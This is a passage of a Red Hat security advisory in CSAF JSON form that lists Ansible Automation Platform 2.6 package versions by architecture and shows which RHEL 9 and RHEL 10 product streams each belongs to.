"name": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"product_id": "receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.15-2.el9ap.ppc64le",
"product": {
"name": "automation-controller-0:4.7.15-2.el9ap.ppc64le",
"product_id": "automation-controller-0:4.7.15-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.15-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"product": {
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"product_id": "automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.7.15-2.el9ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el10ap.ppc64le",
"product": {
"name": "receptor-0:1.6.7-1.el10ap.ppc64le",
"product_id": "receptor-0:1.6.7-1.el10ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el10ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"product_id": "receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el10ap?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"product_id": "receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el10ap?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"product_id": "aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.7.6-3.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"product_id": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.17-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.17-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.17-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.s390x",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.s390x",
"product_id": "receptor-0:1.6.7-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"product_id": "receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"product_id": "receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.15-2.el9ap.s390x",
"product": {
"name": "automation-controller-0:4.7.15-2.el9ap.s390x",
"product_id": "automation-controller-0:4.7.15-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.15-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.7.15-2.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el10ap.s390x",
"product": {
"name": "receptor-0:1.6.7-1.el10ap.s390x",
"product_id": "receptor-0:1.6.7-1.el10ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el10ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"product_id": "receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el10ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"product_id": "receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el10ap?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"product_id": "aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.7.6-3.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"product": {
"name": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"product_id": "python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp@3.14.1-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"product": {
"name": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"product_id": "python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debugsource@3.14.1-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"product": {
"name": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"product_id": "python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-aiohttp-debuginfo@3.14.1-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"product_id": "python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow@12.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"product_id": "python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debugsource@12.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"product": {
"name": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"product_id": "python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/python3.12-pillow-debuginfo@12.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"product": {
"name": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"product_id": "automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy@2.6.17-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"product": {
"name": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"product_id": "automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server@2.6.17-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"product": {
"name": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"product_id": "automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-debugsource@2.6.17-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"product": {
"name": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"product_id": "automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-gateway-proxy-server-debuginfo@2.6.17-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el9ap.aarch64",
"product": {
"name": "receptor-0:1.6.7-1.el9ap.aarch64",
"product_id": "receptor-0:1.6.7-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"product_id": "receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"product_id": "receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.7.15-2.el9ap.aarch64",
"product": {
"name": "automation-controller-0:4.7.15-2.el9ap.aarch64",
"product_id": "automation-controller-0:4.7.15-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.7.15-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.7.15-2.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-0:1.6.7-1.el10ap.aarch64",
"product": {
"name": "receptor-0:1.6.7-1.el10ap.aarch64",
"product_id": "receptor-0:1.6.7-1.el10ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor@1.6.7-1.el10ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"product": {
"name": "receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"product_id": "receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debugsource@1.6.7-1.el10ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"product": {
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"product_id": "receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/receptor-debuginfo@1.6.7-1.el10ap?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch"
},
"product_reference": "ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools-0:26.7.2-1.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch"
},
"product_reference": "ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools-0:26.7.2-1.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src"
},
"product_reference": "ansible-dev-tools-0:26.7.2-1.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-tox-ansible-0:26.7.1-1.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src"
},
"product_reference": "python-tox-ansible-0:26.7.1-1.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-tox-ansible-0:26.7.1-1.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch"
},
"product_reference": "python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch"
},
"product_reference": "ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools-0:26.7.2-1.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch"
},
"product_reference": "ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools-0:26.7.2-1.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src"
},
"product_reference": "ansible-dev-tools-0:26.7.2-1.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-tox-ansible-0:26.7.1-1.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src"
},
"product_reference": "python-tox-ansible-0:26.7.1-1.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-tox-ansible-0:26.7.1-1.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch"
},
"product_reference": "python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el10ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64"
},
"product_reference": "receptor-0:1.6.7-1.el10ap.aarch64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el10ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le"
},
"product_reference": "receptor-0:1.6.7-1.el10ap.ppc64le",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el10ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x"
},
"product_reference": "receptor-0:1.6.7-1.el10ap.s390x",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el10ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src"
},
"product_reference": "receptor-0:1.6.7-1.el10ap.src",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-0:1.6.7-1.el10ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64"
},
"product_reference": "receptor-0:1.6.7-1.el10ap.x86_64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debuginfo-0:1.6.7-1.el10ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64"
},
"product_reference": "receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el10ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el10ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el10ap.s390x as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptor-debugsource-0:1.6.7-1.el10ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64"
},
"product_reference": "receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "receptorctl-0:1.6.7-1.el10ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 10",
"product_id": "10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch"
},
"product_reference": "receptorctl-0:1.6.7-1.el10ap.noarch",
"relates_to_product_reference": "10Base-Ansible-Automation-Platform-2.6"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch"
},
"product_reference": "ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools-0:26.7.2-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch"
},
"product_reference": "ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-dev-tools-0:26.7.2-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src"
},
"product_reference": "ansible-dev-tools-0:26.7.2-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.7.15-2.el9ap.src as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src"
},
"product_reference": "automation-controller-0:4.7.15-2.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.7.15-2.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.6 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.6-Developer-1.3"
},
{
"category": "default_component_of",
"full_product_name": {
